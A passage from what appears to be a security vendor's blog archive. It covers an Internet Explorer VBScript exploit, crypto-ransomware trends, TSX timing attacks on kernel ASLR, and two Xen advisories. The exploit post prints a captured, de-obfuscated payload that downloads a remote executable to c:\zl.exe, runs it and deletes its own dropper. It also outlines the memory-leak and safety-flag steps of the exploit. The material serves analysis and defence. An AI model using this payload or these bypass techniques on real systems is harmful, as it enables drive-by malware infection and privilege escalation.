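/* Buggy pattern: the new count is recorded before the allocation is known
 * to have succeeded, and is not rolled back on failure. */
int resize_buggy(struct array_model *a, size_t new_count, int simulate_oom)
{
    assert(a != NULL);
    a->count = new_count;
    int *p = simulate_oom ? NULL : realloc(a->data, new_count * sizeof *p);
    if (p == NULL)
        return -1; /* count now exceeds the real allocation */
    a->data = p;
    return 0;
}

/* Safer pattern: commit the new count only after the allocation succeeds. */
int resize_checked(struct array_model *a, size_t new_count, int simulate_oom)
{
    assert(a != NULL);
    int *p = simulate_oom ? NULL : realloc(a->data, new_count * sizeof *p);
    if (p == NULL)
        return -1;
    a->data = p;
    a->count = new_count;
    return 0;
}
```

After a failed `resize_buggy` call, any bounds check against `count` passes for indices far beyond the storage that is actually allocated, which is the out-of-bounds access the exploit builds on.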

Once type confusion is achieved, one could adopt Yang Yu’s approach to leak memory addresses using BSTR. An attacker would just need to change the array’s element type to BSTR and then corrupt its header. This essentially allows any memory address to be leaked, which makes it easy for an attacker to determine the location of COleScript – an object holding safety flags for the VB interpreter. Normally, some VB functionality, such as file system interaction and program launching, is restricted in the browser. However, resetting the respective flag allows an attacker to operate within IE as if it were a standalone VB shell.

In fact, the PoC is so straightforward that using it is trivial – one just needs to swap in their VB payload and it’s ready to ship for exploit kits and drive-by campaigns. Last week, we got hold of a Fiddler capture of a malicious web page exploiting this vulnerability.

The VB payload was obfuscated and hidden in a JavaScript snippet on the same page:


The de-obfuscated payload looks like this:

  set shell=createobject("Shell.Application")
  shell.ShellExecute "cmd.exe", " /c echo Set Post = CreateObject(""Msxml2.XMLHTTP"")
  >> c:\\nb.vbs & echo Set Shell = CreateObject(""Wscript.Shell"")
  >> c:\\nb.vbs & echo Post.Open ""GET"", "&nbnburl&" ,0
  >> c:\\nb.vbs & echo Post.Send()
  >> c:\\nb.vbs & echo Set aGet = CreateObject(""ADODB.Stream"")
  >> c:\\nb.vbs & echo aGet.Mode = 3
  >> c:\\nb.vbs & echo aGet.Type = 1
  >> c:\\nb.vbs & echo aGet.Open()
  >> c:\\nb.vbs & echo aGet.Write(Post.responseBody)
  >> c:\\nb.vbs & echo aGet.SaveToFile ""c:\\zl.exe"",2
  >> c:\\nb.vbs & echo wscript.sleep 1000
  >> c:\\nb.vbs & echo Shell.Run (""c:\\zl.exe"")
  >> c:\\nb.vbs & echo Set fsox = CreateObject(""Scripting.Filesystemobject"")
  >> c:\\nb.vbs & echo fsox.DeleteFile(WScript.ScriptFullName)
  >> c:\\nb.vbs & c:\\nb.vbs"

After the payload launches a shell, it connects to nbnburl (a link to a malicious exe). The server response is saved in the C:\ drive as zl.exe, which is then executed.

It should be noted that during our testing phase, the exploit didn’t work every single time. We conducted a series of experiments where we ran our exploit 25 times, and recorded how many runs resulted in a shell. Our observations indicate success rates ranging from 8/25 to 25/25. Of course, a better experiment could be designed, offering more statistically accurate results. In our case, we were testing to see if the exploit was 100% stable. Turns out, it isn’t. The one exception is IE 11 with enhanced protected mode, which thwarted the Unicorn exploit 25/25 times! EPM is disabled by default due to several compatibility issues, so users must manually enable it under Settings->Internet Options->Advanced, and check “Enable Enhanced Protected Mode” under Security.
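To give a feel for how much uncertainty 25 runs leave, here is a minimal sketch that computes a Wilson score interval for a success rate. This is an illustration added for the reader, not part of our original experiment; the function name `wilson_interval` and the choice of a 95% level (z = 1.96) are assumptions.

```python
import math


def wilson_interval(successes, trials, z=1.96):
    """Wilson score interval for a binomial proportion (z = 1.96 is about 95%)."""
    if trials <= 0:
        raise ValueError("trials must be positive")
    p = successes / trials
    denom = 1 + z * z / trials
    centre = (p + z * z / (2 * trials)) / denom
    half = z * math.sqrt(p * (1 - p) / trials + z * z / (4 * trials * trials)) / denom
    # Clamp to [0, 1] to absorb floating-point rounding at the edges.
    return max(0.0, centre - half), min(1.0, centre + half)


if __name__ == "__main__":
    # The two extremes observed in the runs described above.
    for successes in (8, 25):
        low, high = wilson_interval(successes, 25)
        print(f"{successes}/25 successes: interval {low:.2f} to {high:.2f}")
```

With only 25 runs per configuration the interval is wide, which is why the numbers above should be read as a stability check rather than a precise measurement.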

For Bromium customers, this attack isn’t any different from other drive-by-downloads – the attack will be isolated and the following LAVA graph will be recorded:


This bug really is a special one — it’s reasonably stable, it is able to bypass the security mechanisms implemented in the latest Windows system, and it doesn’t require any 3rd party plugins (such as Java Runtime). Therefore, the impact factor is going to be enormous since it’s unlikely that all users will instantly update their systems.

The question now is, wouldn’t it be safer to simply disable all backwards compatibility features and get rid of the legacy software? The easy answer is yes, but if we scrutinize this matter a bit we can see that it’s not that straightforward. Backwards compatibility is there for a reason – if a software update changes the workflow of an application, users must be given an option to return to their old setup. This minimizes failures that could be caused by the patches.

Unfortunately, there’s no easy solution, and software update management is a huge problem today. Isolation is one viable way to address this issue.

November 19, 2014 / Vadim Kotov

Would you like some encryption with your turkey?

Crypto-ransomware continues to grow and mutate. Yet another family, called CoinVault, popped up the other day. Like Cryptographic Locker, this one is a .NET application; it is not as advanced as CryptoLocker or CryptoWall, but it apparently does its job reasonably well.
We were wondering recently whether there are any trends in crypto-ransomware, how the threat evolves over time, and whether there is any connection between the gangs. So we wrote a report that summarizes our analysis of six ransom Trojans:

  • Dirty Decrypt
  • CryptoLocker
  • CryptoWall / CryptoDefense
  • Critroni/CTB Locker
  • TorrentLocker
  • Cryptographic Locker

We looked at nearly 30 samples and here are the main findings of the research:

  • The latest families target a huge number of enterprise file formats from documents and images to CAD files and financial data instead of just common consumer file types.
  • Crypto-ransomware uses every possible attack vector to get into victim machines.
  • Samples analyzed use fairly complex obfuscation and covert launch techniques that allow them to evade detection in the early stages of infection.
  • Communication with command and control servers is encrypted and extremely hard to spot in the network traffic.
  • Cryptography used in the samples analyzed is for the most part implemented correctly and encrypted files are impossible to recover without a key.
  • All recent ransomware accepts payments in Bitcoins only. Apparently there’s a good way of laundering BTC or maybe even a service on the black market.
  • Crypto-ransomware matures and evolves from version to version: additional features are added to ensure that files are impossible to recover (e.g. deleting shadow copies), and flaws are getting fixed.

This threat won’t go away: as long as people pay the ransom, new ransomware families will appear. For the detailed analysis of the aforementioned families, read the full report.

Bromium customers should not worry about this threat since we’re able to isolate crypto-ransomware and prevent it from accessing the file system. If a crypto-enabled piece of malware successfully executes inside the micro VM, LAVA will produce an attack graph that looks like this:



LAVA provides full details of the ransomware activity, the vector used to attack the system and the location of the attacker’s C&C server. We will continue to track developments with these types of attacks and will provide additional information as it becomes available.

October 27, 2014 / Rafal Wojtczuk

TSX improves timing attacks against KASLR

Mega biblion mega kakon…

… and similarly a long blog is a nuisance, so I managed to squeeze the essence of it into a single sentence, the title. If it is not entirely clear, read on.


A typical privilege escalation exploit based on a kernel vulnerability works by corrupting the kernel memory in a way advantageous for an attacker. Two scenarios are possible:

  1. arbitrary code execution in kernel mode
  2. data-only; just alter kernel memory so that privileges are elevated (e.g. change the access token of the current process)

Usually, the first method is the most straightforward and the most flexible. With SMEP enabled, an attacker cannot just divert kernel execution into code stored in usermode pages; more work is needed, a generic method being ROP in the kernel body.

Kernel ASLR

Usually, both of the above methods require some knowledge of the kernel memory layout. In particular, in order to build a ROP chain in the kernel body, we need to know the base of the kernel or a driver. In Windows 8.1, significant changes were introduced so that the attacker no longer gets the memory layout for free. They affect only processes running with an integrity level lower than medium, but this is the most interesting case, as OS-based sandboxes encapsulate untrusted code in such a process. The effectiveness of Windows 8.1 KASLR depends on the type of vulnerability primitive available to the attacker:

  1. If one can read and write arbitrary addresses with arbitrary contents multiple times, there is no problem, as one can learn the full memory layout.
  2. If one can overwrite an arbitrary address with arbitrary content at least twice, then a generic method is to overwrite the IDT entry for interrupt Y with usermode address X (note that the IDT base can be obtained via the unprivileged sidt instruction), and then change the type of the page holding X so that it becomes a superuser page (possible because page table entries are at a known location). Finally, trigger code execution with the int Y instruction. I assume this is the message of this post, although they do not discuss how to locate a kernel code pointer (meaning, beat KASLR) that subsequently should be overwritten. In some cases we do not need to know the address of the kernel code pointer, e.g. if it lives in an area that we can overflow or alter under a use-after-free condition.
  3. If one can just control a kernel function pointer, then… We can divert execution neither to usermode (because of SMEP) nor to kernelmode (because of KASLR we do not know addresses of any ROP gadget). Any hints?

Recently I played with a vulnerability from the third category, and (at least for me) KASLR provided significant resistance. It can be argued that there is potential for kernel bugs that leak some pointers and thus allow KASLR to be bypassed, but something more generic would be better.

Timing attacks against KASLR

An excellent paper describes methods to bypass KASLR via timing attacks. One of the discussed methods is: in usermode, access kernel address X, and measure the time elapsed until the usermode exception handler is invoked. The point is that even though usermode access to X throws a page fault regardless of whether X is in mapped kernel memory or not, the timings are different. When we recover the list of mapped pages, we can infer the kernel base (or some driver base) and consequently the addresses of useful code snippets in it – all we need to build a ROP chain.

Timing attacks need to take care of the inherent noise. Particularly, on Windows invoking the usermode exception handler requires a lot of CPU instructions, and the difference in timing can be difficult to observe. It would be much better if the probing did not result in the whole kernel page fault handler executing. Any hints?

TSX to the rescue

Haswell Intel CPUs introduced the “transactional synchronization extensions”. It means that only recent CPUs support them; moreover, Intel recommends disabling them via microcode update, as they are apparently not reliable. Yet we may assume that someday they will be fixed and become widespread.

TSX makes kernel address probing much faster and less noisy. If an instruction executed within an XBEGIN/XEND block (in usermode) tries to access kernel memory, then no page fault is raised – instead, a transaction abort happens, so execution never leaves usermode. On my i7-4800MQ CPU, the relevant timings, in CPU cycles, are (minimal/average/variance, 2000 probes, top half of results discarded):

  1. access in TSX block to mapped kernel memory: 172 175 2
  2. access in TSX block to unmapped kernel memory: 200 200 0
  3. access in __try block to mapped kernel memory: 2172 2187 35
  4. access in __try block to unmapped kernel memory: 2192 2213 57

The difference is visible with the naked eye; an attack using TSX is much simpler and faster.
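The way the figures above are reduced (discard the top half of the probes, then take minimum, average and variance) can be sketched as follows. This is a minimal illustration, not the measurement code used for the table: the function names, the use of population variance, the threshold value and the sample lists are all assumptions, and the sample lists are synthetic numbers made up to resemble the table, not measured data.

```python
from statistics import mean, pvariance


def summarize(samples):
    """Return (minimum, average, variance) after discarding the top half of the samples."""
    if len(samples) < 2:
        raise ValueError("need at least two samples")
    # Keep the fastest half; slow outliers are mostly interrupts and other noise.
    kept = sorted(samples)[: len(samples) // 2]
    # Population variance is an assumption; the post does not say which variant was used.
    return min(kept), mean(kept), pvariance(kept)


def looks_mapped(samples, threshold):
    """Classify a probed address as mapped if its trimmed average is below the threshold."""
    _, average, _ = summarize(samples)
    return average < threshold


if __name__ == "__main__":
    # Synthetic cycle counts (NOT measurements), with a few noisy outliers mixed in.
    mapped_like = [172, 173, 175, 176, 179, 400, 900, 2500, 3000, 5000]
    unmapped_like = [200, 200, 200, 200, 200, 450, 800, 2600, 3100, 4000]
    threshold = 188  # hypothetical cut-off between the two averages in the table
    print(summarize(mapped_like), looks_mapped(mapped_like, threshold))
    print(summarize(unmapped_like), looks_mapped(unmapped_like, threshold))
```

Discarding the slowest half is a cheap way to suppress noise: a probe can only be slowed down by interference, never sped up, so the fastest samples are the most representative.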

Two points as a take-away:

  1. KASLR can be bypassed in an OS-independent way; this post describes how the existing techniques can be improved utilizing TSX instructions.
  2. The attack is possible because of the shared address space between kernel and usermode. A hypervisor has a separate address space, and therefore it is not prone to similar attacks.

October 1, 2014 / Rafal Wojtczuk

Musings on the recent Xen Security Advisories

As all careful readers of this blog certainly know, the Bromium vSentry hypervisor (uXen) has been derived from Xen. It means parts of the codebase are shared between the two projects, and vulnerabilities found in Xen sometimes are relevant for uXen. The two recent Xen Security Advisories, XSA-105 and XSA-108, are not particularly severe (at least for vSentry), but feature interesting details related to generic hypervisor hardening that are worth discussing. One may wish to read the original Xen advisories before proceeding.


XSA-105

The title of the advisory is “Missing privilege level checks in x86 HLT, LGDT, LIDT, and LMSW emulation”. The impact (for Xen) is that unprivileged usermode code in a VM can elevate to the VM kernel.
In some scenarios, when the CPU cannot execute an instruction in a VM properly (because e.g. this instruction touches a memory-mapped register and has a device-specific side effect), Xen emulates the instruction. The problem is that the code responsible for emulating the above instructions did not check whether the CPU was in kernel mode. In particular, LGDT and LIDT are normally available in kernel mode only, as they change crucial CPU registers. Because of the vulnerability, a user process in a VM (even one with very low privileges, e.g. Untrusted integrity level in the case of Windows) could effectively execute LIDT or LGDT and take full control over the VM.

Exploitation is straightforward in the case of Windows 7: one can just create a fake IDT in usermode, and the kernel will transfer control to the attacker’s code (residing in usermode pages) upon the first interrupt. On Windows 8 running on a CPU featuring SMEP, the attacker needs a bit more work, namely creating a ROP chain in the kernel – fortunately for the attacker, at the entry to the [software] interrupt handler, all general-purpose registers are controllable, so it is easy to achieve the stack pivot.

It is remarkable that, in fact, no sane OS needs these instructions to be emulated in normal circumstances. Still, a complete emulator imported into Xen is available throughout the VM’s lifetime, resulting in a vulnerability. In the early days of uXen development, it was recognized that the emulator constitutes an attack vector, and a conscious effort was made to reduce the number of supported instructions. Therefore, uXen is not vulnerable – when an exploit is run in a vSentry microVM, the emulation is denied (with a message
(uXEN) c:/br/bld/uxen/xen/uxen/arch/x86/x86_emulate/x86_emulate.c:1383:d187 instruction emulation restricted for twobyte-instruction 0x1
in the logs) and the microVM is killed.
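The two defences discussed above (checking the privilege level before emulating a privileged instruction, and refusing to emulate anything outside a small supported set) can be illustrated with a toy model. This is a sketch only and bears no relation to the actual Xen or uXen emulator code: the function `emulate`, the exception classes and the example allowlist are hypothetical.

```python
# Instructions named in the advisory; on real hardware they require CPL 0.
PRIVILEGED = {"HLT", "LGDT", "LIDT", "LMSW"}


class GuestFault(Exception):
    """A fault to be injected into the guest (e.g. #GP), as real hardware would raise."""


class EmulationDenied(Exception):
    """The emulator refuses the instruction; the caller may decide to kill the VM."""


def emulate(mnemonic, cpl, allowed=None):
    """Toy emulator entry point.

    mnemonic: instruction name; cpl: current privilege level of the guest (0 = kernel);
    allowed: optional set of mnemonics the emulator supports (hardened configuration).
    """
    # Hardening: refuse anything outside the (hypothetical) supported set.
    if allowed is not None and mnemonic not in allowed:
        raise EmulationDenied(mnemonic)
    # The check reported as missing: privileged instructions are for kernel mode only.
    if mnemonic in PRIVILEGED and cpl != 0:
        raise GuestFault("#GP")
    return f"emulated {mnemonic}"


if __name__ == "__main__":
    print(emulate("LIDT", cpl=0))
    for args in (("LIDT", 3, None), ("LIDT", 0, {"MOV"})):
        try:
            emulate(*args)
        except (GuestFault, EmulationDenied) as exc:
            print(type(exc).__name__, exc)
```

The second defence is the more generic one: an instruction that is never emulated cannot have an emulation bug, regardless of whether the privilege check was written correctly.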

To sum up, Xen users should worry about this vulnerability if they run untrusted code in their VMs (think sandboxed code) and care about privilege elevation within VM. uXen is not affected.


XSA-108

The title of the advisory is “Improper MSR range used for x2APIC emulation”. The impact is that a malicious VM kernel can crash Xen or read up to 3K of its memory, from an address that is not under control of an attacker.

The root cause is that the code responsible for emulation of access to local APIC registers in x2APIC mode supported 1024 registers, but allocated buffer space for 256 registers only. If a write access (by wrmsr instruction) is requested by VM, no harm is done, as only a limited number of known registers are actually emulated. On the other hand, the code implementing read access emulation just reads from the vlapic->regs buffer (that is one page long), at an offset controlled by the attacker (must be less than 16K).
Consequently, memory located up to 12K after the vlapic->regs buffer is read and returned to the VM. More precisely, 4-byte integers located at 16-byte-aligned addresses can be read. If the virtual addresses adjacent to the vlapic->regs buffer are unmapped, this results in a Xen crash; if they are mapped, their contents leak to the VM.
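The figures quoted above (16K, 12K and 3K) follow directly from the register layout. The short sketch below redoes the arithmetic using only the numbers given in the text; the constant and function names are made up for the illustration.

```python
PAGE_SIZE = 4096       # vlapic->regs is one page long
REG_STRIDE = 16        # registers sit at 16-byte-aligned offsets
REG_WIDTH = 4          # each read returns a 4-byte integer
BUFFER_REGS = 256      # registers the buffer has room for
EMULATED_REGS = 1024   # registers the read path accepted


def leak_summary():
    """Compute the out-of-bounds read window implied by the constants above."""
    offsets = [index * REG_STRIDE for index in range(EMULATED_REGS)]
    out_of_bounds = [off for off in offsets if off >= PAGE_SIZE]
    return {
        # Size of the buffer actually needed for 256 registers.
        "buffer_bytes": BUFFER_REGS * REG_STRIDE,
        # Exclusive upper bound on the attacker-controlled offset.
        "offset_limit": EMULATED_REGS * REG_STRIDE,
        # Address range past the buffer that can be touched.
        "window_bytes": EMULATED_REGS * REG_STRIDE - PAGE_SIZE,
        # Number of distinct 4-byte values readable past the buffer.
        "oob_registers": len(out_of_bounds),
        # Total amount of data that can actually be returned to the VM.
        "leak_bytes": len(out_of_bounds) * REG_WIDTH,
    }


if __name__ == "__main__":
    for key, value in leak_summary().items():
        print(f"{key}: {value}")
```

So the window spans 12K of addresses, but since only 4 bytes out of every 16 are returned, at most 3K of data can be read.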

The vulnerable code is present in uXen. uXen uses a specialized memory manager (dubbed “memcache”) that preallocates a large contiguous virtual memory range for the purpose of mapping VM-related pages. As a result, a uXen crash is unlikely; it can happen only when the vlapic->regs buffer is mapped near the end of the memcache.
Similarly, the information leak is somewhat restricted – memcache stores only pages allocated for uXen purposes, therefore (if we neglect the unlikely “end of memcache” scenario) there is no possibility that unrelated host kernel memory can leak to the microVM. In the common case, memcache assigns consecutive virtual addresses for mapping of subsequent page allocations. During microVM setup, the order of allocation is such that the three pages allocated immediately after the vlapic->regs allocation store the VMCS, VMCS shadow and MSR bitmap pages. Therefore, in the common case, all the attacker can achieve is leaking the lower 32 bits of pointers from the VMCS, which might help to deduce the ASLR layout of the host kernel. This is not a catastrophic problem in itself, but it can aid in the exploitation of another, unrelated vulnerability. In a corner case when microVM creation races with heavy map/unmap operations done on another microVM’s memory, this memory would leak to the attacker as well.

To sum up, this vulnerability has the potential to crash the whole hypervisor or leak a limited amount of data from the hypervisor. This is not a very severe impact, although if one runs multiple VMs of different origin on the same host and is very serious about the possibility of leaking data (even a small amount from a location not controlled by an attacker) from one VM to another, prompt patching is justified. Interestingly, there was quite some concern in the media about this vulnerability, but it was clearly overhyped.

Interestingly, vSentry microVMs use xAPIC mode, not x2APIC mode. The vulnerability can be exploited only in x2APIC mode, which means that an attacker needs to enable x2APIC mode first. However, this results in the microVM OS being unable to use the APIC and hanging in IPI processing. In order to exploit this vulnerability repeatedly for more than a few seconds, the attacker would need to patch the VM OS to use the APIC in x2APIC mode, which is far from trivial, yet imaginable.
It also means we missed a generic hardening opportunity – we should support only a single APIC mode. There is still room for improvement, but considering that since the release of the first vSentry version there has been no vulnerability in Xen allowing for escape from a VM that would affect us, it looks like we have done a fairly decent job.

